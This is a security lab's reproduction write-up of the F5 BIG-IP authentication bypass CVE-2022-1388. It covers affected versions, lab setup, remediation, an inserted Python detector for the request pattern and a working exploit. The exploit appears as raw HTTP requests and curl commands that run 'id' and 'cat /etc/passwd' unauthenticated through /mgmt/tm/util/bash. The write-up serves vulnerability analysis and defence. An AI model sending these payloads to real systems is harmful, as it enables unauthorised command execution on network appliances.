CVE-2022-1388 Reproduction

CVE-2022-1388: BIG-IP iControl REST Vulnerability

0x00 Impact

Impact

This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.

According to the official description, the vulnerability allows an unauthenticated attacker to reach the BIG-IP system through the management interface and execute arbitrary system commands, create or delete files, and shut down services.

Product              | Branch | Affected versions | Fixes introduced in | Severity | CVSSv3 score
BIG-IP (all modules) | 17.x   | None              | 17.0.0              | Critical | 9.8
                     | 16.x   | 16.1.0 - 16.1.2   | 16.1.2.2            |          |
                     | 15.x   | 15.1.0 - 15.1.5   | 15.1.5.1            |          |
                     | 14.x   | 14.1.0 - 14.1.4   | 14.1.4.6            |          |
                     | 13.x   | 13.1.0 - 13.1.4   | 13.1.5              |          |
                     | 12.x   | 12.1.0 - 12.1.6   | No official patch   |          |
                     | 11.x   | 11.6.1 - 11.6.5   | No official patch   |          |

0x01 Reproduction

Download the virtual-machine images of the four affected versions from the official site https://downloads.f5.com/esd/productlines.jsp and reproduce locally:

When choosing an image, pick a virtual-machine OVA package whose version falls within the affected range.

Once downloaded, double-click the image to import it, or import it from within the virtualization software:


After the import completes, start the VM. To find its IP address, log in on the console as root/default and run ifconfig mgmt.

Then open https://<ip> in a browser; when the login page appears, capture the request with a proxy.


The exploit referenced from https://packetstormsecurity.com/files/167007/F5-BIG-IP-Remote-Code-Execution.html is as follows:

# F5 BIG-IP RCE exploitation (CVE-2022-1388)

POST (1):

POST /mgmt/tm/util/bash HTTP/1.1
Host: <redacted>:8443
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0

{"command": "run" , "utilCmdArgs": " -c 'id' " }

curl command line:

$ curl -i -s -k -X $'POST' \
  -H $'Host: <redacted>:8443' \
  -H $'Authorization: Basic YWRtaW46' \
  -H $'Connection: keep-alive, X-F5-Auth-Token' \
  -H $'X-F5-Auth-Token: 0' \
  -H $'Content-Length: 52' \
  --data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \'id\' \" }\x0d\x0a' \
  $'https://<redacted>:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080


POST (2):

POST /mgmt/tm/util/bash HTTP/1.1
Host: <redacted>:8443
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0

{"command": "run" , "utilCmdArgs": " -c ' cat /etc/passwd' " }

curl command line:

$ curl -i -s -k -X $'POST' \
  -H $'Host: <redacted>:8443' \
  -H $'Authorization: Basic YWRtaW46' -H $'Connection: keep-alive, X-F5-Auth-Token' \
  -H $'X-F5-Auth-Token: 0' \
  --data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \' cat /etc/passwd\' \" }\x0d\x0a\x0d\x0a' \
  $'https://<redacted>/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080

The issue is probably related to bypassing front-end and back-end authentication with the empty credentials admin: (the admin user with an empty password), combined with the HTTP hop-by-hop request header problem:

https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open

https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers

The HTTP hop-by-hop request header problem, roughly speaking, is this:

A request can also define its own set of custom hop-by-hop headers by listing their names in the Connection header, like so:

Connection: close, X-Foo, X-Bar

In this example we are asking the proxy to treat X-Foo and X-Bar as hop-by-hop, meaning we want the proxy to remove them from the request before forwarding it.

During reproduction it was found that only on versions 14.x-16.x does the request require the header Host: localhost in order to work.
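As an added example (not from the original post or the PoC author), the following Python models the hop-by-hop stripping described above and flags the request pattern from the PoC over a constructed sample request; the function names, the indicator labels and the sample values are my own choices.

```python
import base64

# RFC 7230 hop-by-hop headers that a proxy always strips before forwarding.
ALWAYS_HOP_BY_HOP = {"connection", "keep-alive", "proxy-authenticate", "proxy-authorization",
                     "te", "trailer", "transfer-encoding", "upgrade"}

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body); header names lowercased."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def hop_by_hop_names(headers):
    """Names a proxy would drop: the fixed set plus whatever the client listed in Connection."""
    listed = {t.strip().lower() for t in headers.get("connection", "").split(",") if t.strip()}
    return ALWAYS_HOP_BY_HOP | listed

def strip_hop_by_hop(headers):
    """Model the front end forwarding the request: the hop-by-hop headers are removed."""
    drop = hop_by_hop_names(headers)
    return {k: v for k, v in headers.items() if k not in drop}

def flag_cve_2022_1388(raw):
    """Return indicator labels (my own names) for the request pattern shown in the PoC above."""
    _method, path, headers, _body = parse_request(raw)
    reasons = []
    if path.startswith("/mgmt/tm/util/bash"):
        reasons.append("iControl REST bash endpoint")
    if "x-f5-auth-token" in headers and "x-f5-auth-token" in hop_by_hop_names(headers):
        reasons.append("X-F5-Auth-Token declared hop-by-hop via Connection")
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            user, _, password = base64.b64decode(auth.split(None, 1)[1]).decode().partition(":")
        except (ValueError, IndexError):  # malformed base64 or non-UTF-8 credentials
            user, password = "", None
        if user == "admin" and password == "":
            reasons.append("Basic auth with empty admin password")
    return reasons

# Constructed sample mirroring the request shape of the PoC above.
SAMPLE_REQUEST = ("POST /mgmt/tm/util/bash HTTP/1.1\r\nHost: localhost\r\n"
                  "Authorization: Basic YWRtaW46\r\nConnection: keep-alive, X-F5-Auth-Token\r\n"
                  "X-F5-Auth-Token: 0\r\n\r\n" '{"command": "run", "utilCmdArgs": " -c \'id\' "}')
```

Running strip_hop_by_hop on the parsed sample shows the token header gone while the Basic Authorization header survives to the back end, which is the header combination the detection keys on.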


0x02 Remediation

It is recommended to upgrade to the latest version, or to follow the vendor's Recommended Actions: https://support.f5.com/csp/article/K23605346

On affected versions, the following steps can be taken to mitigate the attack:

Block iControl REST access through self IP addresses

Block iControl REST access through the management interface

Modify the BIG-IP httpd configuration

0x03 References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388

https://support.f5.com/csp/article/K23605346

https://packetstormsecurity.com/files/167007/F5-BIG-IP-Remote-Code-Execution.html

https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open

https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers

Published 2022-05-18 09:42:57 | Category: Vulnerability Analysis

Author: 山石网科安研院 (Hillstone Networks Security Research Institute)
